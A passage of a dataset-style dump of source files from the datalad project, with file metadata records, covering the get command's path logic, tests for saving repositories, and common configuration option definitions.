%s' % shortened_repr(path))\n # some functions downstream expect a str\n refds_path = refds.path\n if dataset and not path:\n # act on the whole dataset if nothing else was specified\n path = refds_path\n\n # keep track of error results for paths that do not exist\n error_reported = {}\n content_by_ds = {}\n # use subdatasets() to discover any relevant content that is not\n # already present in the root dataset (refds)\n for sdsres in Subdatasets.__call__(\n contains=path,\n # maintain path argument semantics and pass in dataset arg\n # as is\n dataset=dataset,\n # always come from the top to get sensible generator behavior\n bottomup=False,\n # when paths are given, they will constrain the recursion\n # automatically, and we need to enable recursion so we can\n # location path in subdatasets several levels down\n recursive=True if path else recursive,\n recursion_limit=None if path else recursion_limit,\n return_type='generator',\n on_failure='ignore',\n result_renderer='disabled'):\n if sdsres.get('type', None) != 'dataset':\n # if it is not about a 'dataset' it is likely content in\n # the root dataset\n if sdsres.get('status', None) == 'impossible' and \\\n sdsres.get('message', None) == \\\n 'path not contained in any matching subdataset':\n target_path = Path(sdsres['path'])\n if refds.pathobj != target_path and \\\n refds.pathobj not in target_path.parents:\n yield dict(\n action='get',\n path=str(target_path),\n status='error',\n message=('path not associated with dataset %s',\n refds),\n )\n continue\n # check if we need to obtain anything underneath this path\n # the subdataset() call above will only look _until_ it\n # hits the targetpath\n for res in _install_targetpath(\n refds,\n Path(sdsres['path']),\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n description,\n jobs=jobs,\n ):\n # fish out the datasets that 'contains' a targetpath\n # and store them for later\n if res.get('status', None) in ('ok', 'notneeded') and \\\n 'contains' in res:\n dsrec = content_by_ds.get(res['path'], set())\n dsrec.update(res['contains'])\n content_by_ds[res['path']] = dsrec\n if res.get('status', None) != 'notneeded':\n # all those messages on not having installed anything\n # are a bit pointless\n # \"notneeded\" for annex get comes below\n # prevent double yielding of impossible result\n if _check_error_reported_before(res, error_reported):\n continue\n yield res\n else:\n # dunno what this is, send upstairs\n yield sdsres\n # must continue for both conditional branches above\n # the rest is about stuff in real subdatasets\n continue\n # instance of the closest existing dataset for this result\n ds = Dataset(sdsres['parentds']\n if sdsres.get('state', None) == 'absent'\n else sdsres['path'])\n assert 'contains' in sdsres\n # explore the unknown\n for target_path in sdsres.get('contains', []):\n # essentially the same as done above for paths in the root\n # dataset, but here we are starting from the closest\n # discovered subdataset\n for res in _install_targetpath(\n ds,\n Path(target_path),\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n description,\n jobs=jobs,\n ):\n known_ds = res['path'] in content_by_ds\n if res.get('status', None) in ('ok', 'notneeded') and \\\n 'contains' in res:\n dsrec = content_by_ds.get(res['path'], set())\n dsrec.update(res['contains'])\n content_by_ds[res['path']] = dsrec\n # prevent double-reporting of datasets that have been\n # installed by explorative installation to get to target\n # paths, prior in this loop\n if res.get('status', None) != 'notneeded' or not known_ds:\n # prevent double yielding of impossible result\n if _check_error_reported_before(res, error_reported):\n continue\n yield res\n\n if not get_data:\n # done already\n return\n\n # and now annex-get, this could all be done in parallel now\n for ds, content in content_by_ds.items():\n for res in _get_targetpaths(\n Dataset(ds),\n content,\n refds.path,\n source,\n jobs):\n if 'path' not in res or res['path'] not in content_by_ds:\n # we had reports on datasets and subdatasets already\n # before the annex stage\n yield res\n" }, { "alpha_fraction": 0.7397769689559937, "alphanum_fraction": 0.7397769689559937, "avg_line_length": 28.88888931274414, "blob_id": "69078beb1fd40f965303390748d651e1571ec793", "content_id": "ffe2b2b8f8bc57c07b4099d31a4ea263515862b5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "permissive", "max_line_length": 78, "num_lines": 9, "path": "/datalad/plugin/add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.add_readme is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.add_readme instead.\",\n DeprecationWarning)\n\nfrom datalad.local.add_readme import *\n" }, { "alpha_fraction": 0.6093872785568237, "alphanum_fraction": 0.6186801195144653, "avg_line_length": 31.39285659790039, "blob_id": "c3f5d63c15a6288245d57e8eeeab652a091aff7e", "content_id": "4973e46f9c81a1cd9117a75a7d8c11842c9de3c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6349, "license_type": "permissive", "max_line_length": 90, "num_lines": 196, "path": "/datalad/support/tests/test_repo_save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test saveds function\"\"\"\n\nimport shutil\n\nfrom datalad.api import create\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_repo_status,\n create_tree,\n eq_,\n get_annexstatus,\n get_convoluted_situation,\n known_failure_windows,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n on_windows,\n rmtree,\n)\n\n\n@with_tempfile\ndef test_save_basics(path=None):\n ds = Dataset(path).create(result_renderer='disabled')\n # nothing happens\n eq_(list(ds.repo.save(paths=[], _status={})),\n [])\n\n # dataset is clean, so nothing happens with all on default\n eq_(list(ds.repo.save()),\n [])\n\n\ndef _test_save_all(path, repocls):\n ds = get_convoluted_situation(path, repocls)\n orig_status = ds.repo.status(untracked='all')\n # TODO test the results when the are crafted\n res = ds.repo.save()\n # make sure we get a 'delete' result for each deleted file\n eq_(\n set(r['path'] for r in res if r['action'] == 'delete'),\n {str(k) for k, v in orig_status.items()\n if k.name in ('file_deleted', 'file_staged_deleted')}\n )\n saved_status = ds.repo.status(untracked='all')\n # we still have an entry for everything that did not get deleted\n # intentionally\n eq_(\n len([f for f, p in orig_status.items()\n if not f.match('*_deleted')]),\n len(saved_status))\n # everything but subdataset entries that contain untracked content,\n # or modified subsubdatasets is now clean, a repo simply doesn touch\n # other repos' private parts\n for f, p in saved_status.items():\n if p.get('state', None) != 'clean':\n assert f.match('subds_modified'), f\n\n # Since we already have rich filetree, now save at dataset level\n # recursively and introspect some known gotchas\n resr = ds.save(recursive=True)\n\n # File within subdataset got committed to git-annex, which was not the\n # case for GitRepo parent https://github.com/datalad/datalad/issues/7351\n assert_in_results(\n resr,\n status='ok',\n path=str(ds.pathobj / 'subds_modified' / 'someds' / 'dirtyds' / 'file_untracked'),\n # if key is None -- was committed to git which should have not happened!\n key=\"MD5E-s14--2c320e0c56ed653384a926292647f226\")\n\n return ds\n\n\n@slow # 11sec on travis\n@known_failure_windows # see gh-5462\n@with_tempfile\ndef test_gitrepo_save_all(path=None):\n _test_save_all(path, GitRepo)\n\n\n@slow # 11sec on travis\n@known_failure_windows # see gh-5462\n@with_tempfile\ndef test_annexrepo_save_all(path=None):\n _test_save_all(path, AnnexRepo)\n\n\n@with_tempfile\ndef test_save_typechange(path=None):\n ckwa = dict(result_renderer='disabled')\n ds = Dataset(path).create(**ckwa)\n foo = ds.pathobj / 'foo'\n # save a file\n foo.write_text('some')\n ds.save(**ckwa)\n # now delete the file and replace with a directory and a file in it\n foo.unlink()\n foo.mkdir()\n bar = foo / 'bar'\n bar.write_text('foobar')\n res = ds.save(**ckwa)\n assert_in_results(res, path=str(bar), action='add', status='ok')\n assert_repo_status(ds.repo)\n if not on_windows:\n # now replace file with subdataset\n # (this is https://github.com/datalad/datalad/issues/5418)\n bar.unlink()\n Dataset(ds.pathobj / 'tmp').create(**ckwa)\n shutil.move(ds.pathobj / 'tmp', bar)\n res = ds.save(**ckwa)\n assert_repo_status(ds.repo)\n assert len(ds.subdatasets(**ckwa)) == 1\n # now replace directory with subdataset\n rmtree(foo)\n Dataset(ds.pathobj / 'tmp').create(**ckwa)\n shutil.move(ds.pathobj / 'tmp', foo)\n # right now a first save() will save the subdataset removal only\n ds.save(**ckwa)\n # subdataset is gone\n assert len(ds.subdatasets(**ckwa)) == 0\n # but it takes a second save() run to get a valid status report\n # to understand that there is a new subdataset on a higher level\n ds.save(**ckwa)\n assert_repo_status(ds.repo)\n assert len(ds.subdatasets(**ckwa)) == 1\n # now replace subdataset with a file\n rmtree(foo)\n foo.write_text('some')\n ds.save(**ckwa)\n assert_repo_status(ds.repo)\n\n\n@with_tempfile\ndef test_save_to_git(path=None):\n ds = Dataset(path).create(result_renderer='disabled')\n create_tree(\n ds.path,\n {\n 'file_ingit': 'file_ingit',\n 'file_inannex': 'file_inannex',\n }\n )\n ds.repo.save(paths=['file_ingit'], git=True)\n ds.repo.save(paths=['file_inannex'])\n assert_repo_status(ds.repo)\n for f, p in get_annexstatus(ds.repo).items():\n eq_(p['state'], 'clean')\n if f.match('*ingit'):\n assert_not_in('key', p, f)\n elif f.match('*inannex'):\n assert_in('key', p, f)\n\n\n@with_tempfile\ndef test_save_subds_change(path=None):\n ckwa = dict(result_renderer='disabled')\n ds = Dataset(path).create(**ckwa)\n subds = ds.create('sub', **ckwa)\n assert_repo_status(ds.repo)\n rmtree(subds.path)\n res = ds.save(**ckwa)\n assert_repo_status(ds.repo)\n # updated .gitmodules, deleted subds, saved superds\n assert len(res) == 3\n assert_in_results(\n res, type='dataset', path=ds.path, action='save')\n assert_in_results(\n res, type='dataset', path=subds.path, action='delete')\n assert_in_results(\n res, type='file', path=str(ds.pathobj / '.gitmodules'), action='add')\n # now add one via save\n subds2 = create(ds.pathobj / 'sub2', **ckwa)\n res = ds.save(**ckwa)\n # updated .gitmodules, added subds, saved superds\n assert len(res) == 3\n assert_repo_status(ds.repo)\n assert_in_results(\n res, type='dataset', path=ds.path, action='save')\n assert_in_results(\n res, type='dataset', path=subds2.path, action='add')\n assert_in_results(\n res, type='file', path=str(ds.pathobj / '.gitmodules'), action='add')\n" }, { "alpha_fraction": 0.5544453859329224, "alphanum_fraction": 0.556378185749054, "avg_line_length": 41.4561882019043, "blob_id": "d64d2e93c2a7086127d26548b9b27fe9753463e6", "content_id": "1a17045f071cfbaea4de4ae3a7dd90ec0ccaca6c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30528, "license_type": "permissive", "max_line_length": 251, "num_lines": 719, "path": "/datalad/interface/common_cfg.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Common configuration options\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom collections.abc import Mapping\nimport logging\nfrom os import environ\nfrom os.path import expanduser\nfrom os.path import join as opj\nimport time\n\nfrom platformdirs import AppDirs\n\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureInt,\n EnsureFloat,\n EnsureListOf,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.utils import on_windows\n\nlgr = logging.getLogger('datalad.interface.common_cfg')\ndirs = AppDirs(\"datalad\", \"datalad.org\")\n\n\nclass _NotGiven():\n pass\n\n\nclass _ConfigDefinitions(Mapping):\n \"\"\"A container for configuration definitions\n\n This class implements the parts of the dictionary interface\n required to work as a drop-in replacement for the legacy\n data structure used for configuration definitions prior\n DataLad 0.16.\n\n .. note::\n\n This is an internal helper that may change at any time without\n prior notice.\n \"\"\"\n def __init__(self):\n self._defs = {\n k: _ConfigDefinition(**v) for k, v in _definitions.items()\n if v is not _NotGiven\n }\n\n def get(self, *args):\n return self._defs.get(*args)\n\n def keys(self):\n return self._defs.keys()\n\n def items(self):\n return self._defs.items()\n\n def __setitem__(self, key, value):\n self._defs.__setitem__(key, value)\n\n def __getitem__(self, key):\n return self._defs.__getitem__(key)\n\n def __contains__(self, key):\n return self._defs.__contains__(key)\n\n def __iter__(self):\n return self._defs.__iter__()\n\n def __len__(self):\n return self._defs.__len__()\n\n\nclass _ConfigDefinition(Mapping):\n \"\"\"A single configuration definition\n\n This class implements the parts of the dictionary interface\n required to work as a drop-in replacement for the legacy\n data structure used for a configuration definition prior\n DataLad 0.16.\n\n Moreover, it implement lazy evaluation of default values,\n when a 'default_fn' property is given.\n\n .. note::\n\n This is an internal helper that may change at any time without\n prior notice.\n \"\"\"\n def __init__(self, **kwargs):\n # just take it, no validation on ingestions for max speed\n self._props = kwargs\n\n def __getitem__(self, prop):\n if prop == 'default' \\\n and 'default' not in self._props \\\n and 'default_fn' in self._props:\n default = self._props[\"default_fn\"]()\n self._props['default'] = default\n return default\n return self._props[prop]\n\n def __setitem__(self, key, val):\n self._props.__setitem__(key, val)\n\n def get(self, prop, default=None):\n try:\n return self.__getitem__(prop)\n except KeyError:\n return default\n\n def __contains__(self, prop):\n if prop == 'default':\n return 'default' in self._props or 'default_fn' in self._props\n return self._props.__contains__(prop)\n\n def __str__(self):\n return self._props.__str__()\n\n def __repr__(self):\n return self._props.__repr__()\n\n def __iter__(self):\n return self._props.__iter__()\n\n def __len__(self):\n return self._props.__len__()\n\n def update(self, *args, **kwargs):\n self._props.update(*args, **kwargs)\n\n\ndef get_default_ssh():\n from datalad.utils import on_windows\n from pathlib import Path\n\n if on_windows:\n windows_openssh_path = \\\n environ.get(\"WINDIR\", r\"C:\\Windows\") + r\"\\System32\\OpenSSH\\ssh.exe\"\n if Path(windows_openssh_path).exists():\n return windows_openssh_path\n return \"ssh\"\n\n\nsubst_rule_docs = \"\"\"\\\nA substitution specification is a string with a match and substitution\nexpression, each following Python's regular expression syntax. Both expressions\nare concatenated to a single string with an arbitrary delimiter character. The\ndelimiter is defined by prefixing the string with the delimiter. Prefix and\ndelimiter are stripped from the expressions (Example:\n\",^http://(.*)$,https://\\\\1\"). This setting can be defined multiple times.\nSubstitutions will be applied incrementally, in order of their definition. The\nfirst substitution in such a series must match, otherwise no further\nsubstitutions in a series will be considered. However, following the first\nmatch all further substitutions in a series are processed, regardless whether\nintermediate expressions match or not.\"\"\"\n\n\n_definitions = {\n 'datalad.clone.url-substitute.github': {\n 'ui': ('question', {\n 'title': 'GitHub URL substitution rule',\n 'text': 'Mangling for GitHub-related URL. ' + subst_rule_docs\n }),\n 'destination': 'global',\n 'default': (\n # take any github project URL apart into <org>###<identifier>\n r',https?://github.com/([^/]+)/(.*)$,\\1###\\2',\n # replace any (back)slashes with a single dash\n r',[/\\\\]+(?!$),-',\n # replace any whitespace (include urlquoted variant)\n # with a single underscore\n r',\\s+|(%2520)+|(%20)+,_',\n # rebuild functional project URL\n r',([^#]+)###(.*),https://github.com/\\1/\\2',\n )\n },\n # TODO this one should migrate to the datalad-osf extension. however, right\n # now extensions cannot provide default configuration\n # https://github.com/datalad/datalad/issues/5769\n 'datalad.clone.url-substitute.osf': {\n 'ui': ('question', {\n 'title': 'Open Science Framework URL substitution rule',\n 'text': 'Mangling for OSF-related URLs. ' + subst_rule_docs\n }),\n 'destination': 'global',\n 'default': (\n # accept browser-provided URL and convert to those accepted by\n # the datalad-osf extension\n r',^https://osf.io/([^/]+)[/]*$,osf://\\1',\n )\n },\n # this is actually used in downloaders, but kept cfg name original\n 'datalad.crawl.cache': {\n 'ui': ('yesno', {\n 'title': 'Crawler download caching',\n 'text': 'Should the crawler cache downloaded files?'}),\n 'destination': 'local',\n 'type': EnsureBool(),\n },\n # this is actually used in downloaders, but kept cfg name original\n 'datalad.credentials.force-ask': {\n 'ui': ('yesno', {\n 'title': 'Force (re-)entry of credentials',\n 'text': 'Should DataLad prompt for credential (re-)entry? This '\n 'can be used to update previously stored credentials.'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.credentials.githelper.noninteractive':{\n 'ui': ('yesno', {\n 'title': 'Non-interactive mode for git-credential helper',\n 'text': 'Should git-credential-datalad operate in '\n 'non-interactive mode? This would mean to not ask for '\n 'user confirmation when storing new '\n 'credentials/provider configs.'}),\n 'type': bool,\n 'default': False,\n },\n 'datalad.extensions.load': {\n 'ui': ('question', {\n 'title': 'DataLad extension packages to load',\n 'text': 'Indicate which extension packages should be loaded '\n 'unconditionally on CLI startup or on importing '\n \"'datalad.[core]api'. This enables the \"\n 'respective extensions to customize DataLad with '\n 'functionality and configurability outside the '\n 'scope of extension commands. For merely running '\n 'extension commands it is not necessary to load them '\n 'specifically'}),\n 'destination': 'global',\n 'default': None,\n },\n 'datalad.externals.nda.dbserver': {\n 'ui': ('question', {\n 'title': 'NDA database server',\n 'text': 'Hostname of the database server'}),\n 'destination': 'global',\n # Development one is https://development.nimhda.org\n 'default': 'https://nda.nih.gov/DataManager/dataManager',\n },\n 'datalad.locations.cache': {\n 'ui': ('question', {\n 'title': 'Cache directory',\n 'text': 'Where should datalad cache files?'}),\n 'destination': 'global',\n 'default_fn': lambda: dirs.user_cache_dir,\n },\n 'datalad.locations.default-dataset': {\n 'ui': ('question', {\n 'title': 'Default dataset path',\n 'text': 'Where should datalad should look for (or install) a '\n 'default dataset?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(expanduser('~'), 'datalad'),\n },\n 'datalad.locations.locks': {\n 'ui': ('question', {\n 'title': 'Lockfile directory',\n 'text': 'Where should datalad store lock files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'locks')\n },\n 'datalad.locations.sockets': {\n 'ui': ('question', {\n 'title': 'Socket directory',\n 'text': 'Where should datalad store socket files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'sockets'),\n },\n 'datalad.locations.system-procedures': {\n 'ui': ('question', {\n 'title': 'System procedure directory',\n 'text': 'Where should datalad search for system procedures?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.site_config_dir, 'procedures'),\n },\n 'datalad.locations.user-procedures': {\n 'ui': ('question', {\n 'title': 'User procedure directory',\n 'text': 'Where should datalad search for user procedures?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_config_dir, 'procedures'),\n },\n 'datalad.locations.extra-procedures': {\n 'ui': ('question', {\n 'title': 'Extra procedure directory',\n 'text': 'Where should datalad search for some additional procedures?'}),\n 'destination': 'global',\n },\n 'datalad.locations.dataset-procedures': {\n 'ui': ('question', {\n 'title': 'Dataset procedure directory',\n 'text': 'Where should datalad search for dataset procedures (relative to a dataset root)?'}),\n 'destination': 'dataset',\n 'default': opj('.datalad', 'procedures'),\n },\n 'datalad.exc.str.tblimit': {\n 'ui': ('question', {\n 'title': 'This flag is used by datalad to cap the number of traceback steps included in exception logging and result reporting to DATALAD_EXC_STR_TBLIMIT of pre-processed entries from traceback.'}),\n },\n 'datalad.fake-dates': {\n 'ui': ('yesno', {\n 'title': 'Fake (anonymize) dates',\n 'text': 'Should the dates in the logs be faked?'}),\n 'destination': 'local',\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.fake-dates-start': {\n 'ui': ('question', {\n 'title': 'Initial fake date',\n 'text': 'When faking dates and there are no commits in any local branches, generate the date by adding one second to this value (Unix epoch time). The value must be positive.'}),\n 'type': EnsureInt(),\n 'default': 1112911993,\n },\n 'datalad.github.token-note': {\n 'ui': ('question', {\n 'title': 'GitHub token note',\n 'text': 'Description for a Personal access token to generate.'}),\n 'default': 'DataLad',\n },\n 'datalad.tests.nonetwork': {\n 'ui': ('yesno', {\n 'title': 'Skips network tests completely if this flag is set, Examples include test for S3, git_repositories, OpenfMRI, etc'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.nonlo': {\n 'ui': ('question', {\n 'title': 'Specifies network interfaces to bring down/up for testing. Currently used by Travis CI.'}),\n },\n 'datalad.tests.noteardown': {\n 'ui': ('yesno', {\n 'title': 'Does not execute teardown_package which cleans up temp files and directories created by tests if this flag is set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.dataladremote': {\n 'ui': ('yesno', {\n 'title': 'Binary flag to specify whether each annex repository should get datalad special remote in every test repository'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.runcmdline': {\n 'ui': ('yesno', {\n 'title': 'Binary flag to specify if shell testing using shunit2 to be carried out'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.ssh': {\n 'ui': ('yesno', {\n 'title': 'Skips SSH tests if this flag is **not** set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.knownfailures.skip': {\n 'ui': ('yesno', {\n 'title': 'Skips tests that are known to currently fail'}),\n 'type': EnsureBool(),\n 'default': True,\n },\n 'datalad.tests.knownfailures.probe': {\n 'ui': ('yesno', {\n 'title': 'Probes tests that are known to fail on whether or not they are actually still failing'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.tests.setup.testrepos': {\n 'ui': ('question', {\n 'title': 'Pre-creates repositories for @with_testrepos within setup_package'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.tests.temp.dir': {\n 'ui': ('question', {\n 'title': 'Create a temporary directory at location specified by this flag. It is used by tests to create a temporary git directory while testing git annex archives etc'}),\n 'type': EnsureStr(),\n 'default_fn': lambda: environ.get('TMPDIR'),\n },\n 'datalad.tests.temp.keep': {\n 'ui': ('yesno', {\n 'title': 'Function rmtemp will not remove temporary file/directory created for testing if this flag is set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.temp.fs': {\n 'ui': ('question', {\n 'title': 'Specify the temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation'}),\n },\n 'datalad.tests.temp.fssize': {\n 'ui': ('question', {\n 'title': 'Specify the size of temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation'}),\n },\n 'datalad.tests.ui.backend': {\n 'ui': ('question', {\n 'title': 'Tests UI backend',\n # XXX we could add choices...\n 'text': 'Which UI backend to use'}),\n 'default': 'tests-noninteractive',\n },\n 'datalad.tests.usecassette': {\n 'ui': ('question', {\n 'title': 'Specifies the location of the file to record network transactions by the VCR module. Currently used by when testing custom special remotes'}),\n },\n 'datalad.tests.cache': {\n 'ui': ('question', {\n 'title': 'Cache directory for tests',\n 'text': 'Where should datalad cache test files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'tests')\n },\n 'datalad.tests.credentials': {\n 'ui': ('question', {\n 'title': 'Credentials to use during tests',\n 'text': 'Which credentials should be available while running tests? If \"plaintext\" (default), '\n 'a new plaintext keyring would be created in tests temporary HOME. If \"system\", '\n 'no custom configuration would be passed to keyring and known to system credentials '\n 'could be used.'\n }),\n 'destination': 'global',\n 'type': EnsureChoice('plaintext', 'system'),\n 'default': \"plaintext\"\n },\n 'datalad.log.level': {\n 'ui': ('question', {\n 'title': 'Used for control the verbosity of logs printed to '\n 'stdout while running datalad commands/debugging'}),\n },\n 'datalad.log.result-level': {\n 'ui': ('question', {\n 'title': 'Log level for command result messages',\n 'text': \"If 'match-status', it will log 'impossible' \"\n \"results as a warning, 'error' results as errors, and \"\n \"everything else as 'debug'. Otherwise the indicated \"\n \"log-level will be used for all such messages\"}),\n 'type': EnsureChoice('debug', 'info', 'warning', 'error',\n 'match-status'),\n 'default': 'debug',\n },\n 'datalad.log.name': {\n 'ui': ('question', {\n 'title': 'Include name of the log target in the log line'}),\n },\n 'datalad.log.names': {\n 'ui': ('question', {\n 'title': 'Which names (,-separated) to print log lines for'}),\n },\n 'datalad.log.namesre': {\n 'ui': ('question', {\n 'title': 'Regular expression for which names to print log lines for'}),\n },\n 'datalad.log.outputs': {\n 'ui': ('question', {\n 'title': 'Whether to log stdout and stderr for executed commands',\n 'text': 'When enabled, setting the log level to 5 '\n 'should catch all execution output, '\n 'though some output may be logged at higher levels'}),\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.log.timestamp': {\n 'ui': ('yesno', {\n 'title': 'Used to add timestamp to datalad logs'}),\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.log.traceback': {\n 'ui': ('question', {\n 'title': 'Includes a compact traceback in a log message, with '\n 'generic components removed. '\n 'This setting is only in effect when given as an '\n 'environment variable DATALAD_LOG_TRACEBACK. '\n 'An integer value specifies the maximum traceback '\n 'depth to be considered. '\n 'If set to \"collide\", a common traceback prefix '\n 'between a current traceback and a previously logged '\n 'traceback is replaced with \"…\" (maximum depth 100).'}),\n },\n 'datalad.ssh.identityfile': {\n 'ui': ('question', {\n 'title': \"If set, pass this file as ssh's -i option.\"}),\n 'destination': 'global',\n 'default': None,\n },\n 'datalad.ssh.multiplex-connections': {\n 'ui': ('question', {\n 'title': \"Whether to use a single shared connection for multiple SSH processes aiming at the same target.\"}),\n 'destination': 'global',\n 'default': not on_windows,\n 'type': EnsureBool(),\n },\n 'datalad.ssh.try-use-annex-bundled-git': {\n 'ui': ('question', {\n 'title': \"Whether to attempt adjusting the PATH in a remote \"\n \"shell to include Git binaries located in a detected \"\n \"git-annex bundle\",\n 'text': \"If enabled, this will be a 'best-effort' attempt that \"\n \"only supports remote hosts with a Bourne shell and \"\n \"the `which` command available. The remote PATH must \"\n \"already contain a git-annex installation. \"\n \"If git-annex is not found, or the detected git-annex \"\n \"does not have a bundled Git installation, detection \"\n \"failure will not result in an error, but only slow \"\n \"remote execution by one-time sensing overhead per \"\n \"each opened connection.\"}),\n 'destination': 'global',\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.annex.retry': {\n 'ui': ('question',\n {'title': 'Value for annex.retry to use for git-annex calls',\n 'text': 'On transfer failure, annex.retry (sans \"datalad.\") '\n 'controls the number of times that git-annex retries. '\n 'DataLad will call git-annex with annex.retry set '\n 'to the value here unless the annex.retry '\n 'is explicitly configured'}),\n 'type': EnsureInt(),\n 'default': 3,\n },\n 'datalad.repo.backend': {\n 'ui': ('question', {\n 'title': 'git-annex backend',\n 'text': 'Backend to use when creating git-annex repositories'}),\n 'default': 'MD5E',\n },\n 'datalad.repo.direct': {\n 'ui': ('yesno', {\n 'title': 'Direct Mode for git-annex repositories',\n 'text': 'Set this flag to create annex repositories in direct mode by default'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.repo.version': {\n 'ui': ('question', {\n 'title': 'git-annex repository version',\n 'text': 'Specifies the repository version for git-annex to be used by default'}),\n 'type': EnsureInt(),\n 'default': 8,\n },\n 'datalad.runtime.max-annex-jobs': {\n 'ui': ('question', {\n 'title': 'Maximum number of git-annex jobs to request when \"jobs\" option set to \"auto\" (default)',\n 'text': 'Set this value to enable parallel annex jobs that may speed up certain operations (e.g. get file content). The effective number of jobs will not exceed the number of available CPU cores (or 3 if there is less than 3 cores).'}),\n 'type': EnsureInt(),\n 'default': 1,\n },\n 'datalad.runtime.max-batched': {\n 'ui': ('question', {\n 'title': 'Maximum number of batched commands to run in parallel',\n 'text': 'Automatic cleanup of batched commands will try to keep at most this many commands running.'}),\n 'type': EnsureInt(),\n 'default': 20,\n },\n 'datalad.runtime.max-inactive-age': {\n 'ui': ('question', {\n 'title': 'Maximum time (in seconds) a batched command can be'\n ' inactive before it is eligible for cleanup',\n 'text': 'Automatic cleanup of batched commands will consider an'\n ' inactive command eligible for cleanup if more than this'\n ' many seconds have transpired since the command\\'s last'\n ' activity.'}),\n 'type': EnsureInt(),\n 'default': 60,\n },\n 'datalad.runtime.max-jobs': {\n 'ui': ('question', {\n 'title': 'Maximum number of jobs DataLad can run in \"parallel\"',\n 'text': 'Set this value to enable parallel multi-threaded DataLad jobs that may speed up certain '\n 'operations, in particular operation across multiple datasets (e.g., install multiple '\n 'subdatasets, etc).'}),\n 'type': EnsureInt(),\n 'default': 1,\n },\n 'datalad.runtime.pathspec-from-file': {\n 'ui': ('question', {\n 'title': 'Provide list of files to git commands via --pathspec-from-file',\n 'text': \"Instructs when DataLad will provide list of paths to 'git' commands which \"\n \"support --pathspec-from-file option via some temporary file. If set to \"\n \"'multi-chunk' it will be done only if multiple invocations of the command \"\n \"on chunks of files list is needed. If set to 'always', DataLad will always \"\n \"use --pathspec-from-file.\"}),\n 'type': EnsureChoice('multi-chunk', 'always'),\n 'default': 'multi-chunk',\n },\n 'datalad.runtime.raiseonerror': {\n 'ui': ('question', {\n 'title': 'Error behavior',\n 'text': 'Set this flag to cause DataLad to raise an exception on errors that would have otherwise just get logged'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.runtime.report-status': {\n 'ui': ('question', {\n 'title': 'Command line result reporting behavior',\n 'text': \"If set (to other than 'all'), constrains command result report to records matching the given status. 'success' is a synonym for 'ok' OR 'notneeded', 'failure' stands for 'impossible' OR 'error'\"}),\n 'type': EnsureChoice('all', 'success', 'failure', 'ok', 'notneeded', 'impossible', 'error'),\n 'default': None,\n },\n 'datalad.runtime.stalled-external': {\n 'ui': ('question', {\n 'title': 'Behavior for handing external processes',\n 'text': 'What to do with external processes if they do not finish in some minimal reasonable time. '\n 'If \"abandon\", datalad would proceed without waiting for external process to exit. '\n 'ATM applies only to batched git-annex processes. Should be changed with caution.'}),\n 'type': EnsureChoice('wait', 'abandon'),\n 'default': 'wait',\n },\n 'datalad.ui.progressbar': {\n 'ui': ('question', {\n 'title': 'UI progress bars',\n 'text': 'Default backend for progress reporting'}),\n 'default': None,\n 'type': EnsureChoice('tqdm', 'tqdm-ipython', 'log', 'none'),\n },\n 'datalad.ui.color': {\n 'ui': ('question', {\n 'title': 'Colored terminal output',\n 'text': 'Enable or disable ANSI color codes in outputs; \"on\" overrides NO_COLOR environment variable'}),\n 